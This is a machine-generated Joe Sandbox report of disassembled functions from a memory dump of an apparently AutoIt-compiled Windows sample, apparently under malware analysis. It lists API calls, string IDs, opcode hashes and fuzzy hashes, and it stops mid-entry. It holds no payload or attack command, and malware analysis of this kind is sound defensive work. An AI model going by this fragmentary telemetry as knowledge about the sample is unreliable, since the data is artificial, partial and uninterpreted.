                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$_wcslen
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 4099089115-3080491070
                                                                                      • Opcode ID: d680e22123b3fa85cc7e6fa0793d5f1e94bdce34b8271d0e28d8668b7d9b52da
                                                                                      • Instruction ID: 59c7ac9a7e28bf1e840823d4acd5e7437b9d81d964af3d4be3486d3fb9bf636f
                                                                                      • Opcode Fuzzy Hash: d680e22123b3fa85cc7e6fa0793d5f1e94bdce34b8271d0e28d8668b7d9b52da
                                                                                      • Instruction Fuzzy Hash: 8351AC71900249AADF14EBA0CD92EEEB778EF05744F144066F509721A2EB312F98FB60
                                                                                      Function 00C7B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                      • API String ID: 1256254125-769500911
                                                                                      • Opcode ID: 64b1185641e179dfbdf143d03354c5dac93fa7ff5e90d2e9875b2b35278b73aa
                                                                                      • Instruction ID: a95f5fa7ef181c713d1075588e4d0887c0d2fa84e0e593dfe9a41148ee55a2d4
                                                                                      • Opcode Fuzzy Hash: 64b1185641e179dfbdf143d03354c5dac93fa7ff5e90d2e9875b2b35278b73aa
                                                                                      • Instruction Fuzzy Hash: 9841D832A001269ACB146F7D88907BE77B5AF61764B258129F639D7284E735CE81C790
                                                                                      Function 00C85393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C853A0
                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C85416
                                                                                      • GetLastError.KERNEL32 ref: 00C85420
                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00C854A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                      • API String ID: 4194297153-14809454
                                                                                      • Opcode ID: 1c26a69b5c6433bfa66afe46abbbb63e362678460a011b17f42220aa5dbd954f
                                                                                      • Instruction ID: 687e9efe11da535c230dd8b0acb7b2b9b87bbe2cf5d763936f6473c05653c412
                                                                                      • Opcode Fuzzy Hash: 1c26a69b5c6433bfa66afe46abbbb63e362678460a011b17f42220aa5dbd954f
                                                                                      • Instruction Fuzzy Hash: D231A375A006049FDB10EF68C484BAE7BF4EF85309F14806AE515CB392DBB1DE86DB90
                                                                                      Function 00CA3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateMenu.USER32 ref: 00CA3C79
                                                                                      • SetMenu.USER32(?,00000000), ref: 00CA3C88
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA3D10
                                                                                      • IsMenu.USER32(?), ref: 00CA3D24
                                                                                      • CreatePopupMenu.USER32 ref: 00CA3D2E
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CA3D5B
                                                                                      • DrawMenuBar.USER32 ref: 00CA3D63
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                      • String ID: 0$F
                                                                                      • API String ID: 161812096-3044882817
                                                                                      • Opcode ID: c89dec56ebc5cbd39ee45d1a5747405ddb136479c3b0d52b754f7a5482ed0a31
                                                                                      • Instruction ID: d754f2b1a928512efc728393e9351a7100c0340ce9e21bd9e756bdc07ba05c66
                                                                                      • Opcode Fuzzy Hash: c89dec56ebc5cbd39ee45d1a5747405ddb136479c3b0d52b754f7a5482ed0a31
                                                                                      • Instruction Fuzzy Hash: FE418A75A0120AEFDB14CF64D898BEE7BB5FF4A358F140029F916A7360D730AA10DB90
                                                                                      Function 00CA3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CA3A9D
                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CA3AA0
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA3AC7
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CA3AEA
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CA3B62
                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00CA3BAC
                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00CA3BC7
                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00CA3BE2
                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00CA3BF6
                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00CA3C13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$LongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 312131281-0
                                                                                      • Opcode ID: bb75d45a8a6bdf956c3db4fc7d36b1b578d5cd740d30422ce77cf7a7d2afb65c
                                                                                      • Instruction ID: b24e242a5af7e021f4ed7bd53f76d647d5fc8e63795c0a2f53e22243eb3e5ed9
                                                                                      • Opcode Fuzzy Hash: bb75d45a8a6bdf956c3db4fc7d36b1b578d5cd740d30422ce77cf7a7d2afb65c
                                                                                      • Instruction Fuzzy Hash: 1E617D75900249AFDB10DFA4CC91FEE77B8EB0A718F140199FA15A7291C770AE41DB60
                                                                                      Function 00C7B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C7B151
                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B165
                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00C7B16C
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B17B
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7B18D
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B1A6
                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B1B8
                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B1FD
                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B212
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B21D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2156557900-0
                                                                                      • Opcode ID: a18eff551d593416754ad63eec5ab872c8bd661b45735e5905f3b072bafe3d73
                                                                                      • Instruction ID: 00ed2143544123f13f93befdc49ca51ffb7a425a282f27cdf7b671a591a92c96
                                                                                      • Opcode Fuzzy Hash: a18eff551d593416754ad63eec5ab872c8bd661b45735e5905f3b072bafe3d73
                                                                                      • Instruction Fuzzy Hash: 4F318D75500248BFDB10DF64DCC8BAE7BAABB52365F108415FA29DB191D7B8AF408F60
                                                                                      Function 00C42C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00C42C94
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C42CA0
                                                                                      • _free.LIBCMT ref: 00C42CAB
                                                                                      • _free.LIBCMT ref: 00C42CB6
                                                                                      • _free.LIBCMT ref: 00C42CC1
                                                                                      • _free.LIBCMT ref: 00C42CCC
                                                                                      • _free.LIBCMT ref: 00C42CD7
                                                                                      • _free.LIBCMT ref: 00C42CE2
                                                                                      • _free.LIBCMT ref: 00C42CED
                                                                                      • _free.LIBCMT ref: 00C42CFB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 207fdcf16463c1253bbb35480facc6dd79e20e2929c5767799fc778d761c133a
                                                                                      • Instruction ID: 087b1d99bcd284e0be25c70e43f2be8ebe240f51b084850040c20506c9e4ff83
                                                                                      • Opcode Fuzzy Hash: 207fdcf16463c1253bbb35480facc6dd79e20e2929c5767799fc778d761c133a
                                                                                      • Instruction Fuzzy Hash: A511B376100108BFDB02EF95D883CDD3BA9FF15350F9144A5FA489F222DA31EE50AB90
                                                                                      Function 00C11410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C11459
                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00C114F8
                                                                                      • UnregisterHotKey.USER32(?), ref: 00C116DD
                                                                                      • DestroyWindow.USER32(?), ref: 00C524B9
                                                                                      • FreeLibrary.KERNEL32(?), ref: 00C5251E
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C5254B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                      • String ID: close all
                                                                                      • API String ID: 469580280-3243417748
                                                                                      • Opcode ID: c7b552f04f3d74c19abaeb33e1e499975192f147519af3249ca3142d5018c94b
                                                                                      • Instruction ID: 7da344b8c766a0c4f43d7b9cc40758fc99ecfffd87bdd6359f57f2b3721dff44
                                                                                      • Opcode Fuzzy Hash: c7b552f04f3d74c19abaeb33e1e499975192f147519af3249ca3142d5018c94b
                                                                                      • Instruction Fuzzy Hash: 74D1BC35701222CFCB19EF15C495B69F7A0BF06700F1842ADE94A6B252DB30ED96EF54
                                                                                      Function 00C87DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C87FAD
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C87FC1
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C87FEB
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C88005
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88017
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88060
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C880B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                      • String ID: *.*
                                                                                      • API String ID: 769691225-438819550
                                                                                      • Opcode ID: 30dc8d5c582354f01f95896aeca626b9c0399bce58cf5fb67b880b172a7aa092
                                                                                      • Instruction ID: 1ce880cb4faaf175f275de64010b958c5d46e5e41388156aca32179d5942dcd1
                                                                                      • Opcode Fuzzy Hash: 30dc8d5c582354f01f95896aeca626b9c0399bce58cf5fb67b880b172a7aa092
                                                                                      • Instruction Fuzzy Hash: 1C81C1725082019FCB20FF55C484AAEB3E8BF89318F64495EF899C7250EB34DE49DB56
                                                                                      Function 00C15BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00C15C7A
                                                                                        • Part of subcall function 00C15D0A: GetClientRect.USER32(?,?), ref: 00C15D30
                                                                                        • Part of subcall function 00C15D0A: GetWindowRect.USER32(?,?), ref: 00C15D71
                                                                                        • Part of subcall function 00C15D0A: ScreenToClient.USER32(?,?), ref: 00C15D99
                                                                                      • GetDC.USER32 ref: 00C546F5
                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C54708
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00C54716
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00C5472B
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00C54733
                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C547C4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                      • String ID: U
                                                                                      • API String ID: 4009187628-3372436214
                                                                                      • Opcode ID: 8fdf0554f8a12b4da143b9e2180e1fda7e98058257ce33448ecc21c74935aaec
                                                                                      • Instruction ID: 4278cf76160064294e5b95779ddeda37ba2f25251e521c6cd511628ad9d2a0cf
                                                                                      • Opcode Fuzzy Hash: 8fdf0554f8a12b4da143b9e2180e1fda7e98058257ce33448ecc21c74935aaec
                                                                                      • Instruction Fuzzy Hash: 9A71D239400205DFCF298F64C984BEA3BB1FF4A35AF144265FD655A1A6C73089D5EF50
                                                                                      Function 00C8359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C835E4
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • LoadStringW.USER32(00CE2390,?,00000FFF,?), ref: 00C8360A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$_wcslen
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 4099089115-2391861430
                                                                                      • Opcode ID: 04697506e4239be647532bacb26ee1ba34e4b015507e0888916495bba438cab2
                                                                                      • Instruction ID: 3d56f9a7c357d13eed1afdb36196e3a84f283064c5912e081cfbc445921151d9
                                                                                      • Opcode Fuzzy Hash: 04697506e4239be647532bacb26ee1ba34e4b015507e0888916495bba438cab2
                                                                                      • Instruction Fuzzy Hash: 2F517C71900249AADF14EBA0CD92EEEBB38EF05714F444125F615721A1EB306BD9FBA4
                                                                                      Function 00CA8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                        • Part of subcall function 00C2912D: GetCursorPos.USER32(?), ref: 00C29141
                                                                                        • Part of subcall function 00C2912D: ScreenToClient.USER32(00000000,?), ref: 00C2915E
                                                                                        • Part of subcall function 00C2912D: GetAsyncKeyState.USER32(00000001), ref: 00C29183
                                                                                        • Part of subcall function 00C2912D: GetAsyncKeyState.USER32(00000002), ref: 00C2919D
                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00CA8B6B
                                                                                      • ImageList_EndDrag.COMCTL32 ref: 00CA8B71
                                                                                      • ReleaseCapture.USER32 ref: 00CA8B77
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00CA8C12
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CA8C25
                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00CA8CFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                      • API String ID: 1924731296-2107944366
                                                                                      • Opcode ID: 54bd31b726a05514d695fd86e50b195f3887367218ba1c8b09cb1625d6bc9c9d
                                                                                      • Instruction ID: 7662064cce9d030325b3e2c67d781c811c42c19f4843cc37770c99a24ec77cf8
                                                                                      • Opcode Fuzzy Hash: 54bd31b726a05514d695fd86e50b195f3887367218ba1c8b09cb1625d6bc9c9d
                                                                                      • Instruction Fuzzy Hash: 97519A70204304AFD714DF14DC96BAE77E4FB8A718F000629F992972E2CB709A54DB62
                                                                                      Function 00C8C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8C272
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C8C29A
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C8C2CA
                                                                                      • GetLastError.KERNEL32 ref: 00C8C322
                                                                                      • SetEvent.KERNEL32(?), ref: 00C8C336
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C8C341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                      • String ID:
                                                                                      • API String ID: 3113390036-3916222277
                                                                                      • Opcode ID: ed741bc27f4c6564e2f885e80937a9beba1589095ce8c7123f0a41f1e70876a9
                                                                                      • Instruction ID: acd80eeffbfb9ef2759b601fa84571b321e498aad94bbb7fe3f998e9e4e2d19e
                                                                                      • Opcode Fuzzy Hash: ed741bc27f4c6564e2f885e80937a9beba1589095ce8c7123f0a41f1e70876a9
                                                                                      • Instruction Fuzzy Hash: B1316BB1600608AFD721AFA598C8BAB7BFCEB4A748B10851EF456D3250DB34DE059B74
                                                                                      Function 00C7989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C53AAF,?,?,Bad directive syntax error,00CACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C798BC
                                                                                      • LoadStringW.USER32(00000000,?,00C53AAF,?), ref: 00C798C3
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C79987
                                                                                      Strings
                                                                                      Memory Dump Source
